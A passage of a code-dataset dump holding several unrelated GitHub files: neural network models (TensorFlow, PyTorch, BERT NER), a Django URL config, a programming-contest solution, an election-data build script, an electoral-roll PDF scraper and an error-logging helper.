new_length, 1]\n h_pool = tf.nn.max_pool(tf.tanh(conv), pool_w, [1, 1, 1, 1], 'VALID')\n layers.append(tf.squeeze(h_pool, [1, 2]))\n\n return tf.concat(1, layers)\n\n\ndef char_aware_network(char_level_set_size, \n word_level_set_size,\n batch_sz=20,\n num_unrolls=35,\n dropout=0.0,\n max_word_length=65):\n\n input_mat = tf.placeholder(tf.int32, shape=[batch_sz, num_unrolls, max_word_length], name=\"input\")\n\n # embedding\n with tf.variable_scope('embed'):\n embedding_size=15\n char_level_shape = [char_level_set_size, embedding_size]\n embedding_char_level = tf.get_variable('embedding_char_level', char_level_shape)\n scatter_shape = [1, embedding_size]\n scatter_char_embed = tf.scatter_update(embedding_char_level, [0], tf.constant(0.0, shape=scatter_shape))\n embedding_shape = [-1, max_word_length, embedding_size]\n embedding_input_mat = tf.reshape(tf.nn.embedding_lookup(embedding_char_level, input_mat), embedding_shape)\n\n\n # convolutions\n input_to_network = time_delayed_network(embedding_input_mat, \"time_delayed\")\n\n # highway (refer to the paper)\n def highway_transform(input_mat, output_size, num_layers, scope):\n with tf.variable_scope(scope):\n b = -2.0\n for i in range(num_layers):\n # G: non-linearilty, e.g. relu\n non_linearity = tf.nn.relu(linear_transform(input_mat, output_size, scope='hw_g%d' % i))\n\n # t: transform gate\n transform = tf.sigmoid(linear_transform(input_mat, output_size, scope='hw_t%d' % i) + b)\n\n # t*g: what non-linearility info to transform\n # (1-t)*input: what info to carry (carry gate)\n output = transform * non_linearity + (1.0 - transform) * input_mat\n\n input_mat = output\n\n return output\n\n input_to_network = highway_transform(input_to_network, input_to_network.get_shape()[-1], num_layers=2, scope='highway')\n\n # LSTM\n with tf.variable_scope('LSTM'):\n rnn_cell_size = 650\n rnn_layer_size = 2\n\n cell = tf.nn.rnn_cell.BasicLSTMCell(rnn_cell_size, state_is_tuple=True, forget_bias=0.0)\n\n # dropout\n if dropout > 0.0:\n keep_prob = 1.0-dropout\n cell = tf.nn.rnn_cell.DropoutWrapper(cell, output_keep_prob=keep_prob)\n\n # multi layer\n cell = tf.nn.rnn_cell.MultiRNNCell([cell] * rnn_layer_size, state_is_tuple=True)\n\n state_init = cell.zero_state(batch_sz, dtype=tf.float32)\n\n input_to_network = tf.reshape(input_to_network, [batch_sz, num_unrolls, -1])\n input_to_network2 = [tf.squeeze(x, [1]) for x in tf.split(1, num_unrolls, input_to_network)]\n\n outputs, state_end = tf.nn.rnn(cell, input_to_network2, initial_state=state_init, dtype=tf.float32)\n\n logits = []\n with tf.variable_scope('word_embed_linear') as scope:\n for idx, output in enumerate(outputs):\n if idx > 0:\n scope.reuse_variables()\n logits.append(linear_transform(output, word_level_set_size, \"scope_linear_transform\"))\n\n return adict(\n input = input_mat,\n scatter_char_embed=scatter_char_embed,\n state_init=state_init,\n state_end=state_end,\n input_to_network=input_to_network,\n rnn_outputs=outputs,\n embedding_input_mat=embedding_input_mat,\n logits = logits\n )\n\n\ndef cost(logits, batch_sz, num_unrolls):\n with tf.variable_scope('cost'):\n shape = [batch_sz, num_unrolls]\n target_var = tf.placeholder(tf.int64, shape, name='target_var')\n target_list = [tf.squeeze(d, [1]) for d in tf.split(1, num_unrolls, target_var)]\n loss_penalty = tf.reduce_mean(tf.nn.sparse_softmax_cross_entropy_with_logits(logits, target_list), name='loss_penalty')\n return adict(\n target_var=target_var,\n loss=loss_penalty\n )\n\n\n\ndef training_graph(loss, learning_rate):\n\n with 
tf.variable_scope('stochastic'):\n glob_step = tf.Variable(0, name='glob_step', trainable=False)\n learning_rate = tf.Variable(learning_rate, trainable=False, name='learning_rate')\n trainable_vars = tf.trainable_variables()\n grads, glob_norm = tf.clip_by_global_norm(tf.gradients(loss, trainable_vars), 5.0)\n\n optimizer = tf.train.GradientDescentOptimizer(learning_rate)\n train_step = optimizer.apply_gradients(zip(grads, trainable_vars), global_step=glob_step)\n\n return adict(\n learning_rate=learning_rate,\n train_step=train_step,\n glob_norm=glob_norm,\n glob_step=glob_step)\n","repo_name":"baizhima/csci2950-char-level-model","sub_path":"char-aware-model/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":6509,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"39477883108","text":"\nfrom django.urls import path, include\nfrom django.views.generic.base import RedirectView\n\nfrom .views import index, by_department, VacationCreateView, EmployeeCreateView, EmployeeUpdateView, success, \\\n DepartmentCreateView, EmployeeDeleteView, DepartmentDeleteView, VacationDeleteView, recalculate_department, \\\n export_t7_department, export_t7_all, bootstrap_test\n\napp_name = 'vacations'\n\nurlpatterns = [\n #path('bootstrap_test', bootstrap_test, name='test'),\n path('', index, name='index'),\n path('export_t7/', export_t7_all, name='export_t7_all'),\n path('department/', RedirectView.as_view(pattern_name='vacations:index', permanent=False), name='index_redirect'),\n path('department/add/', DepartmentCreateView.as_view(), name='add_department'),\n path('department//delete/', DepartmentDeleteView.as_view(), name='department_delete_form'),\n path('department//export_t7/', export_t7_department, name='export_t7_department'),\n path('department//recalculate', recalculate_department, name='recalculate_department'),\n path('department//', by_department, name='by_department'),\n path('department//add_employee/', EmployeeCreateView.as_view(), name='add_employee'),\n path('employee//edit/', EmployeeUpdateView.as_view(), name='employee_update_form'),\n path('employee//delete/', EmployeeDeleteView.as_view(), name='employee_delete_form'),\n path('employee//', VacationCreateView.as_view(), name='details'),\n path('vacation//delete/', VacationDeleteView.as_view(), name='vacation_delete_form'),\n\n]\n","repo_name":"SipakovV/vacation_scheduler","sub_path":"vacations/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1686,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"95"} +{"seq_id":"22967499691","text":"'''\nResNet in PyTorch.\nReference:\n[1] Kaiming He, Xiangyu Zhang, Shaoqing Ren, Jian Sun\n Deep Residual Learning for Image Recognition. 
arXiv:1512.03385\n'''\nimport os\nimport math\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\nfrom torch.autograd import Variable\nclass BasicBlock(nn.Module):\n\n expansion = 1\n\n def __init__(self, in_channels, out_channels, stride=1):\n super(BasicBlock, self).__init__()\n self.features = nn.Sequential(\n nn.Conv2d(in_channels, out_channels, kernel_size=3, stride=stride, padding=1, bias=False),\n nn.BatchNorm2d(out_channels),\n nn.ReLU(True),\n nn.Conv2d(out_channels, out_channels, kernel_size=3, stride=1, padding=1, bias=False),\n nn.BatchNorm2d(out_channels)\n )\n \n self.shortcut = nn.Sequential()\n if stride != 1 or in_channels != self.expansion * out_channels:\n self.shortcut = nn.Sequential(\n nn.Conv2d(in_channels, self.expansion * out_channels, kernel_size=1, stride=stride, bias=False),\n nn.BatchNorm2d(self.expansion * out_channels),\n )\n\n def forward(self, x):\n out = self.features(x)\n # print(out.shape)\n out += self.shortcut(x)\n out = torch.relu(out)\n return out\n\n\nclass Bottleneck(nn.Module):\n\n expansion = 4\n\n def __init__(self, in_channels, zip_channels, stride=1):\n super(Bottleneck, self).__init__()\n out_channels = self.expansion * zip_channels\n self.features = nn.Sequential(\n nn.Conv2d(in_channels, zip_channels, kernel_size=1, bias=False),\n nn.BatchNorm2d(zip_channels),\n nn.ReLU(inplace=True),\n nn.Conv2d(zip_channels, zip_channels, kernel_size=3, stride=stride, padding=1, bias=False),\n nn.BatchNorm2d(zip_channels),\n nn.ReLU(inplace=True),\n nn.Conv2d(zip_channels, out_channels, kernel_size=1, bias=False),\n nn.BatchNorm2d(out_channels)\n )\n self.shortcut = nn.Sequential()\n if stride != 1 or in_channels != out_channels:\n self.shortcut = nn.Sequential(\n nn.Conv2d(in_channels, out_channels, kernel_size=1, stride=stride, bias=False),\n nn.BatchNorm2d(out_channels)\n )\n\n def forward(self, x):\n out = self.features(x)\n # print(out.shape)\n out += self.shortcut(x)\n out = torch.relu(out)\n return out\n\n\nclass ResNet(nn.Module):\n\n def __init__(self, block, num_blocks, num_classes=10, verbose=False, init_weights=True):\n super(ResNet, self).__init__()\n self.verbose = verbose\n self.in_channels = 64\n self.features = nn.Sequential(\n nn.Conv2d(3, 64, kernel_size=3, stride=1, padding=1, bias=False),\n nn.BatchNorm2d(64),\n nn.ReLU(inplace=True)\n )\n \n self.layer1 = self._make_layer(block, 64, num_blocks[0], stride=1)\n self.layer2 = self._make_layer(block, 128, num_blocks[1], stride=2)\n self.layer3 = self._make_layer(block, 256, num_blocks[2], stride=2)\n self.layer4 = self._make_layer(block, 512, num_blocks[3], stride=2)\n\n self.avg_pool = nn.AdaptiveAvgPool2d((1, 1))\n self.classifer = nn.Linear(512 * block.expansion, num_classes)\n\n if init_weights:\n self._initialize_weights()\n\n def _make_layer(self, block, out_channels, num_blocks, stride):\n strides = [stride] + [1] * (num_blocks - 1)\n layers = []\n for stride in strides:\n layers.append(block(self.in_channels, out_channels, stride))\n self.in_channels = out_channels * block.expansion\n return nn.Sequential(*layers)\n\n def forward(self, x,threshold=1e9,need_penultimate=0):\n out = self.features(x)\n if self.verbose:\n print('block 1 output: {}'.format(out.shape))\n out = self.layer1(out)\n if self.verbose:\n print('block 2 output: {}'.format(out.shape))\n out = self.layer2(out)\n if self.verbose:\n print('block 3 output: {}'.format(out.shape))\n out = self.layer3(out)\n third_layer_output = self.avg_pool(out)\n third_layer_output = 
torch.flatten(third_layer_output, 1)\n\n if self.verbose:\n print('block 4 output: {}'.format(out.shape))\n out = self.layer4(out)\n if self.verbose:\n print('block 5 output: {}'.format(out.shape))\n\n out = self.avg_pool(out)\n if threshold != 1e9:\n out = out.clip(max=threshold)\n out = out.view(out.size(0), -1)\n penultimate_layer = out\n out = self.classifer(out)\n if need_penultimate==4:\n return out,penultimate_layer\n elif need_penultimate==3:\n return out,third_layer_output\n else:\n return out\n\n# # function to extract the multiple features\n# def feature_list(self, x):\n# out_list = []\n# out = self.features(x)\n# out_list.append(out)\n# out = self.layer1(out)\n# out_list.append(out)\n# out = self.layer2(out)\n# out_list.append(out)\n# out = self.layer3(out)\n# out_list.append(out)\n# out = self.layer4(out)\n# out_list.append(out)\n# out = self.avg_pool(out)\n# out = out.view(out.size(0), -1)\n# y = self.classifer(out)\n# return y, out_list\n \n# # function to extract a specific feature\n# def intermediate_forward(self, x, layer_index):\n# out = self.features(x)\n# if layer_index == 1:\n# out = self.layer1(out)\n# elif layer_index == 2:\n# out = self.layer1(out)\n# out = self.layer2(out)\n# elif layer_index == 3:\n# out = self.layer1(out)\n# out = self.layer2(out)\n# out = self.layer3(out)\n# elif layer_index == 4:\n# out = self.layer1(out)\n# out = self.layer2(out)\n# out = self.layer3(out)\n# out = self.layer4(out) \n# return out\n\n# # function to extract the penultimate features\n# def penultimate_forward(self, x):\n# out = self.features(x)\n# out = self.layer1(out)\n# out = self.layer2(out)\n# out = self.layer3(out)\n# penultimate = self.layer4(out)\n# out = self.avg_pool(out)\n# out = out.view(out.size(0), -1)\n# y = self.classifer(out)\n# return y, penultimate\n\n def _initialize_weights(self):\n for m in self.modules():\n if isinstance(m, nn.Conv2d):\n nn.init.kaiming_normal_(m.weight, mode='fan_out', nonlinearity='relu')\n if m.bias is not None:\n nn.init.constant_(m.bias, 0)\n elif isinstance(m, nn.BatchNorm2d):\n nn.init.constant_(m.weight, 1)\n nn.init.constant_(m.bias, 0)\n elif isinstance(m, nn.Linear):\n nn.init.normal_(m.weight, 0, 0.01)\n nn.init.constant_(m.bias, 0)\n\n\ndef ResNet18(verbose=False,**kwargs):\n return ResNet(BasicBlock, [2, 2, 2, 2], verbose=verbose,**kwargs)\n\n\ndef ResNet34(verbose=False,**kwargs):\n return ResNet(BasicBlock, [3, 4, 6, 3], verbose=verbose,**kwargs)\n\n\ndef ResNet50(verbose=False):\n return ResNet(Bottleneck, [3, 4, 6, 3], verbose=verbose)\n\n\ndef ResNet101(verbose=False):\n return ResNet(Bottleneck, [3, 4, 23, 3], verbose=verbose)\n\n\ndef ResNet152(verbose=False):\n return ResNet(Bottleneck, [3, 8, 36, 3], verbose=verbose)\n\n\n","repo_name":"zjs975584714/SHE_ood_detection","sub_path":"models/ResNet.py","file_name":"ResNet.py","file_ext":"py","file_size_in_byte":7605,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"95"}
+{"seq_id":"34655369333","text":"# AOJ 0612\r\n# http://judge.u-aizu.ac.jp/onlinejudge/description.jsp?id=0612\r\n\r\ncastle = []\r\ncmp = []\r\nh = w = 0\r\nleft = 0\r\n\r\ndef initial():\r\n global h, w, left\r\n left = h * w\r\n for i in range(0, h):\r\n left -= castle[i].count(0)\r\n for i in range(0, h):\r\n c = []\r\n for j in range(0, w):\r\n if castle[i][j] == 0:\r\n c.append(-99)\r\n else:\r\n a = castle[i - 1][j - 1:j + 2].count(0)\r\n a += castle[i][j - 1: j + 2].count(0)\r\n a += castle[i + 1][j - 1: j + 2].count(0)\r\n c.append(a)\r\n cmp.append(c)\r\n\r\ndef 
wave(xy):\r\n global h, w, left\r\n z = []\r\n xy1 = []\r\n for i, j in xy:\r\n if castle[i][j] > 0 and castle[i][j] <= cmp[i][j]:\r\n castle[i][j] = 0\r\n left -= 1\r\n z.append((i, j))\r\n for i, j in z:\r\n cmp[i - 1][j - 1] += 1\r\n cmp[i - 1][j ] += 1\r\n cmp[i - 1][j + 1] += 1\r\n cmp[i ][j - 1] += 1\r\n cmp[i ][j ] = -99\r\n cmp[i ][j + 1] += 1\r\n cmp[i + 1][j - 1] += 1\r\n cmp[i + 1][j ] += 1\r\n cmp[i + 1][j + 1] += 1\r\n y = [(i - 1, j - 1), (i - 1, j), (i - 1, j + 1),\r\n (i, j - 1), (i, j + 1),\r\n (i + 1, j - 1), (i + 1, j), (i + 1, j + 1)]\r\n xy1 += y\r\n return xy1\r\n\r\ndef solve():\r\n global h, w, left\r\n initial()\r\n p_left = left + 1\r\n count = 0\r\n xy = [ (i, j) for j in range(1, w) for i in range(1, h)]\r\n while True:\r\n count += 1\r\n xy1 = wave(xy)\r\n if p_left == left:\r\n break\r\n p_left = left\r\n xy = xy1\r\n return count - 1\r\n\r\n#f = open(\"python\\input_0612-2.txt\")\r\nf = open(\"python\\in.txt\")\r\nh, w = map(int, f.readline().split())\r\n#h, w = map(int, input().split())\r\n\r\nfor _ in range(0, h):\r\n c = f.readline().strip()\r\n #c = input().strip()\r\n castle.append([int(x) if x != '.' else 0 for x in c])\r\nans = solve()\r\nprint(ans)\r\n","repo_name":"hy17kwkj/python","sub_path":"AizuOnlineJudge/aoj0612.py","file_name":"aoj0612.py","file_ext":"py","file_size_in_byte":1988,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"41697991080","text":"\nfrom os import getenv, environ\nfrom os.path import exists, join, expanduser\nfrom random import seed, sample, randint, uniform\nfrom subprocess import run\n\nfrom tqdm.notebook import tqdm as log_progress\n\nimport torch\nfrom torch import optim\n\nfrom naeval.ner.datasets import (\n load_factru,\n load_ne5,\n)\n\nfrom slovnet.s3 import S3\nfrom slovnet.io import (\n format_jl,\n parse_jl,\n\n load_gz_lines,\n dump_gz_lines\n)\nfrom slovnet.board import (\n TensorBoard,\n LogBoard,\n MultiBoard\n)\nfrom slovnet.const import (\n TRAIN, TEST,\n PER, LOC, ORG,\n CUDA0,\n)\nfrom slovnet.token import tokenize\n\nfrom slovnet.model.bert import (\n RuBERTConfig,\n BERTEmbedding,\n BERTEncoder,\n BERTNERHead,\n BERTNER\n)\nfrom slovnet.markup import (\n SpanMarkup,\n show_span_markup\n)\nfrom slovnet.vocab import BERTVocab, BIOTagsVocab\nfrom slovnet.encoders.bert import BERTNERTrainEncoder, BERTInferEncoder\nfrom slovnet.score import (\n NERBatchScore,\n NERScoreMeter,\n score_ner_batch\n)\nfrom slovnet.mask import (\n Masked,\n split_masked,\n pad_masked\n)\n\nfrom slovnet.infer.bert import BERTNERInfer, BERTTagDecoder\n\nDATA_DIR = 'data'\nMODEL_DIR = 'model'\nBERT_DIR = 'bert'\n\nRAW_DIR = join(DATA_DIR, 'raw')\n\nCORUS_NE5 = join(RAW_DIR, 'Collection5')\nCORUS_FACTRU = join(RAW_DIR, 'factRuEval-2016-master')\n\nNE5 = join(DATA_DIR, 'ne5.jl.gz')\nFACTRU = join(DATA_DIR, 'factru.jl.gz')\n\nS3_DIR = '02_bert_ner'\nS3_NE5 = join(S3_DIR, NE5)\nS3_FACTRU = join(S3_DIR, FACTRU)\n\nVOCAB = 'vocab.txt'\nEMB = 'emb.pt'\nENCODER = 'encoder.pt'\nNER = 'ner.pt'\n\nBERT_VOCAB = join(BERT_DIR, VOCAB)\nBERT_EMB = join(BERT_DIR, EMB)\nBERT_ENCODER = join(BERT_DIR, ENCODER)\n\nS3_RUBERT_DIR = '01_bert_news/rubert'\nS3_MLM_DIR = '01_bert_news/model'\nS3_BERT_VOCAB = join(S3_RUBERT_DIR, VOCAB)\nS3_BERT_EMB = join(S3_MLM_DIR, EMB)\nS3_BERT_ENCODER = join(S3_MLM_DIR, ENCODER)\n\nMODEL_ENCODER = join(MODEL_DIR, ENCODER)\nMODEL_NER = join(MODEL_DIR, NER)\n\nS3_MODEL_ENCODER = join(S3_DIR, MODEL_ENCODER)\nS3_MODEL_NER = join(S3_DIR, MODEL_NER)\n\nBOARD_NAME = 
getenv('board_name', '02_bert_ner')\nRUNS_DIR = 'runs'\n\nTRAIN_BOARD = '01_train'\nTEST_BOARD = '02_test'\n\nSEED = int(getenv('seed', 72))\nDEVICE = getenv('device', CUDA0)\nBERT_LR = float(getenv('bert_lr', 0.000045))\nLR = float(getenv('lr', 0.0075))\nLR_GAMMA = float(getenv('lr_gamma', 0.45))\nEPOCHS = int(getenv('epochs', 5))\n\nSEQ_LEN = int(getenv('SEQ_LEN', 256))\nBATCH_SIZE = int(getenv('BATCH_SIZE', 64))\n\n#####################\n#\n# CUSTOM TAGS TUNING\n#\n############### START\n\nCUSTOM_TUNING = False # Set this flag to true in order to use your custom dataset and tags\nCUSTOM_TEXTS = join(DATA_DIR, 'custom-dataset.jl.gz') # Put your own data into the data dir\nTAGS = ['CUSTOM-TAG'] if CUSTOM_TUNING else [PER, LOC, ORG] # List all your custom tags \n\n################# END\n\n\ndef process_batch(model, criterion, batch):\n input, target = batch\n\n pred = model(input.value)\n pred = pad_masked(pred, input.mask)\n mask = pad_masked(input.mask, input.mask)\n\n loss = criterion(pred, target.value, target.mask)\n\n pred = Masked(pred, mask)\n return batch.processed(loss, pred)\n","repo_name":"natasha/slovnet","sub_path":"scripts/02_bert_ner/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3133,"program_lang":"python","lang":"en","doc_type":"code","stars":197,"dataset":"github-code","pt":"95"} +{"seq_id":"17118621879","text":"# -*- coding:utf-8 _*_\nclass Solution:\n def minDistance(self, word1, word2):\n \"\"\"\n :type word1: str\n :type word2: str\n :rtype: int\n \"\"\"\n if word1=='':\n return len(word2)\n if word2=='':\n return len(word1)\n len1=len(word1)\n len2=len(word2)\n table=[]\n\n for i in range(len1):\n table.append([max(len1,len2)]*len2)\n add=0\n for i in range(len2):\n if word1[-1]!=word2[len2-1-i]:\n add+=1\n table[0][i]=add\n else:\n table[0][i]=add\n break\n t=i\n for i in range(t+1,len2):\n add+=1\n table[0][i]=add\n for i in range(1,len1):\n for j in range(len2):\n tem1=word1[-(1+i):]\n tem2=word2[-(1+j):]\n table[i][j]=self.check(tem1,tem2,table)\n return table[-1][-1]\n\n\n\n def check(self,word1,word2,table):\n len1=len(word1)\n len2=len(word2)\n if len2==1:\n if word2 in word1:\n return len1-1\n else:\n return len1\n\n t=0\n for i in range(min(len1, len2)):\n if word1[i] == word2[i]:\n t += 1\n else:\n break\n word1 = word1[t:]\n word2 = word2[t:]\n if word2=='':\n return len(word1)\n if word1=='':\n return len(word2)\n if t>0:\n return table[len1-1-t][len2-1-t]\n else:\n\n return 1+min(\n table[len1-2][len2-1],\n table[len1-1][len2-2],\n table[len1-2][len2-2]\n )\no=Solution()\nprint(o.minDistance(\"invention\",\n\"\"))","repo_name":"hemxzp/leetcode","sub_path":"72. Edit Distance.py","file_name":"72. 
Edit Distance.py","file_ext":"py","file_size_in_byte":1770,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"13800606410","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Dec 14 10:26:57 2017\n\n@author: dhingratul\n\"\"\"\n\nimport time\nfrom selenium.webdriver.support.ui import Select\nimport urllib\nimport sys\nsys.path.insert(0, '../tools/')\nimport utils\n\n\ndef getDistrict(m_url, element):\n driver = utils.getDriver(m_url)\n mySelect_D = Select(driver.find_element_by_id(element))\n num_D = len(mySelect_D.options) # Start from 1, 0 -- Select\n return driver, mySelect_D, num_D\n\n\ndef getConstt(m_url, i, element):\n driver, mySelect_D, num_D = getDistrict(m_url, 'mainContent_DistrictList')\n mySelect_D.options[i].click()\n mySelect_C = Select(driver.find_element_by_id(element))\n return driver, mySelect_D, mySelect_C\n\n\nm_url = 'https://103.23.150.75/Search/SearchPDF.aspx'\nmdir = '../data/Maharashtra/'\ndriver, mySelect_D, num_D = getDistrict(m_url, 'mainContent_DistrictList')\nfor i in range(1, num_D):\n if i != 1:\n driver, mySelect_D, _ = getDistrict(m_url, 'mainContent_DistrictList')\n mySelect_D.options[i].click()\n # Select Constt.\n mySelect_C = Select(driver.find_element_by_id('mainContent_AssemblyList'))\n num_C = len(mySelect_C.options)\n for j in range(1, num_C):\n C_name = mySelect_C.options[j].text\n C_name = C_name.split(\" - \")[0]\n mySelect_C.options[j].click()\n mySelect_P = Select(driver.find_element_by_id('mainContent_PartList'))\n num_P = len(mySelect_P.options)\n links = []\n names = []\n for k in range(1, num_P):\n print('\\n', i, j, k)\n base_url = 'https://103.23.150.75/searchpdf/pdf/'\n p1 = format(int(C_name), '03d')\n p2 = format(int(mySelect_P.options[k].text.split(' - ')[0]), '04d')\n prefix = 'A{}/A{}{}.pdf'.format(p1, p1, p2)\n url = base_url + prefix\n fid = prefix.replace(\"/\", \"_\")\n try:\n #flag = utils.download_file_W(url, mdir, fid, True)\n flag = utils.download_file_R(url, mdir, fid, \"Maharashtra.txt\")\n if flag == 0:\n with open(\"Maharashtra.txt\", \"a\") as myfile:\n myfile.write(url + '\\n')\n except urllib.error.HTTPError:\n with open(\"Maharashtra.txt\", \"a\") as myfile:\n myfile.write(url + '\\n')\n driver.quit()\n time.sleep(10)\n driver, mySelect_D, mySelect_C = getConstt(m_url, i, 'mainContent_AssemblyList')\n\n","repo_name":"in-rolls/electoral_rolls","sub_path":"maharashtra/maharashtra.py","file_name":"maharashtra.py","file_ext":"py","file_size_in_byte":2469,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"95"} +{"seq_id":"25566938105","text":"# Imports from python.\nimport csv\nfrom datetime import datetime\nimport os\nimport pickle\n\n\n# Imports from other dependencies.\nimport us\n\n\nPWD = os.path.abspath(os.path.dirname(__file__))\nDB = os.path.join(PWD, \"db\")\nELECTIONS_DIR = os.path.join(DB, \"elections\")\nPKL_DIR = os.path.join(PWD, \"elections/data/\")\n\n# GET YEARS\nYEARS = list(os.walk(ELECTIONS_DIR))[0][1]\n\n\ndef read_csv_to_dict(path):\n with open(path) as csvfile:\n reader = csv.DictReader(csvfile)\n return [row for row in reader]\n\n\ndef cast_dates(obj):\n for key in obj:\n if (key[-5:] == \"_date\" or key[-9:] == \"_deadline\") and obj[key]:\n obj[key] = datetime.strptime(obj[key], \"%Y-%m-%d\")\n return obj\n\n\ndef cast_bools(obj):\n for key in obj:\n if type(obj[key]) == str:\n if obj[key].lower() == \"false\" or obj[key].lower() == \"no\":\n obj[key] = False\n 
return obj\n if obj[key].lower() == \"true\" or obj[key].lower() == \"yes\":\n obj[key] = True\n return obj\n return obj\n\n\ndef cast_nulls(obj):\n for key in obj:\n if obj[key] == \"\":\n obj[key] = None\n return obj\n\n\ndef cast_types(obj):\n obj = cast_nulls(obj)\n obj = cast_bools(obj)\n obj = cast_dates(obj)\n return obj\n\n\ndef pickle_parties():\n parties = [\n cast_types(party)\n for party in read_csv_to_dict(os.path.join(DB, \"parties/parties.csv\"))\n ]\n with open(os.path.join(PKL_DIR, \"parties.pkl\"), \"wb\") as pkl_file:\n pickle.dump(parties, pkl_file, protocol=2)\n\n\ndef pickle_years():\n with open(os.path.join(PKL_DIR, \"years.pkl\"), \"wb\") as pkl_file:\n pickle.dump(YEARS, pkl_file, protocol=2)\n\n\ndef pickle_electoral_votes():\n for YEAR in YEARS:\n vote_zones = []\n electoral_votes_for_year = os.path.join(\n ELECTIONS_DIR, YEAR, \"electoral-votes.csv\"\n )\n\n if os.path.exists(electoral_votes_for_year):\n votes_data = read_csv_to_dict(electoral_votes_for_year)\n for vote_zone in votes_data:\n vote_zone = cast_types(vote_zone)\n vote_zone[\"type\"] = (\n \"by-district\" if vote_zone[\"district\"] else \"statewide\"\n )\n vote_zones.append(vote_zone)\n\n os.makedirs(os.path.join(PKL_DIR, YEAR), exist_ok=True)\n with open(\n os.path.join(PKL_DIR, \"{}/electoral-votes.pkl\".format(YEAR)), \"wb\"\n ) as pkl_file:\n pickle.dump(vote_zones, pkl_file, protocol=2)\n\n\ndef pickle_seats_for_body(government_level, chosen_branch):\n if isinstance(government_level, str):\n government_level = [government_level]\n\n for YEAR in YEARS:\n seats = []\n seat_dir_for_level = os.path.join(\n ELECTIONS_DIR, YEAR, \"seats\", *government_level\n )\n\n for path, dirs, files in os.walk(seat_dir_for_level):\n path_parts = path.split(os.path.sep)\n level_components = path_parts[-len(government_level) :]\n\n if len(dirs) == 0 and chosen_branch == path_parts[-1]:\n for file in files:\n seat_type = file.replace(\".csv\", \"\")\n seats_data = read_csv_to_dict(os.path.join(path, file))\n for seat in seats_data:\n seat = cast_types(seat)\n seat[\"jurisdiction\"] = \"/\".join(government_level)\n seat[\"seat_type\"] = seat_type\n seats.append(seat)\n elif len(dirs) == 0 and level_components == government_level:\n branch_singleton_file = None\n for file in files:\n file_name = file.replace(\".csv\", \"\")\n if file_name == chosen_branch:\n branch_singleton_file = file\n\n if branch_singleton_file:\n seats_data = read_csv_to_dict(\n os.path.join(path, branch_singleton_file)\n )\n for seat in seats_data:\n seat = cast_types(seat)\n seat[\"jurisdiction\"] = \"/\".join(government_level)\n seats.append(seat)\n else:\n pass\n else:\n pass\n\n os.makedirs(os.path.join(PKL_DIR, YEAR), exist_ok=True)\n with open(\n os.path.join(\n PKL_DIR,\n \"{}/{}-{}-seats.pkl\".format(\n YEAR, government_level[-1], chosen_branch\n ),\n ),\n \"wb\",\n ) as pkl_file:\n pickle.dump(seats, pkl_file, protocol=2)\n\n\ndef pickle_elections():\n for YEAR in YEARS:\n elections = []\n election_dir = os.path.join(ELECTIONS_DIR, YEAR, \"calendars\")\n jurisdiction = \"\"\n for path, dirs, files in os.walk(election_dir):\n if len(dirs) == 0:\n try:\n per_day_metadata = {\n \"__\".join(\n [\n row[\"state\"],\n row[\"election_date\"],\n row[\"election_variant\"],\n ]\n ): row[\"election_notes\"]\n for row in read_csv_to_dict(\n os.path.join(path, \"meta.csv\")\n )\n }\n except FileNotFoundError:\n per_day_metadata = {}\n\n for file in files:\n election_type = file.replace(\".csv\", \"\")\n\n if election_type == \"meta\":\n continue\n\n 
elections_data = read_csv_to_dict(os.path.join(path, file))\n for election in elections_data:\n election = cast_types(election)\n\n election[\"election_day_notes\"] = per_day_metadata.get(\n \"__\".join(\n [\n election[\"state\"],\n election[\"election_date\"].strftime(\n \"%Y-%m-%d\"\n ),\n election.get(\"election_variant\", \"\"),\n ]\n ),\n \"\",\n )\n\n election[\"jurisdiction\"] = jurisdiction\n election[\"election_type\"] = election_type\n elections.append(election)\n jurisdiction = \"\"\n else:\n jurisdiction = dirs[0]\n\n os.makedirs(os.path.join(PKL_DIR, YEAR), exist_ok=True)\n with open(\n os.path.join(PKL_DIR, \"{}/elections.pkl\".format(YEAR)), \"wb\"\n ) as pkl_file:\n pickle.dump(elections, pkl_file, protocol=2)\n\n\ndef pickle_data():\n pickle_parties()\n pickle_years()\n\n pickle_electoral_votes()\n\n pickle_seats_for_body(\"federal\", \"legislative\")\n pickle_seats_for_body(\"federal\", \"executive\")\n\n for state in us.STATES:\n if state.statehood_year: # Taxation w/o representation! Nix D.C.\n pickle_seats_for_body([\"state\", state.abbr.lower()], \"legislative\")\n pickle_seats_for_body([\"state\", state.abbr.lower()], \"executive\")\n pickle_seats_for_body([\"state\", state.abbr.lower()], \"judicial\")\n\n pickle_elections()\n\n\nif __name__ == \"__main__\":\n pickle_data()\n","repo_name":"The-Politico/us-elections","sub_path":"build.py","file_name":"build.py","file_ext":"py","file_size_in_byte":7582,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"95"} +{"seq_id":"37199705831","text":"import traceback\nimport sys\nfrom logs.models import Error\n\n\ndef error_log(file, category=None, user=None, ip=None):\n type_, value, _traceback = sys.exc_info()\n output = 'Type: {} \\n Value: {} \\n'.format(type_, value)\n trace = traceback.extract_tb(sys.exc_info()[2])\n # Add the event to the log\n output += 'Traceback is: \\n'\n for (file, linenumber, affected, line) in trace:\n output += '- Error at function {}\\n'. format(affected)\n output += '- At: {} {}\\n'. 
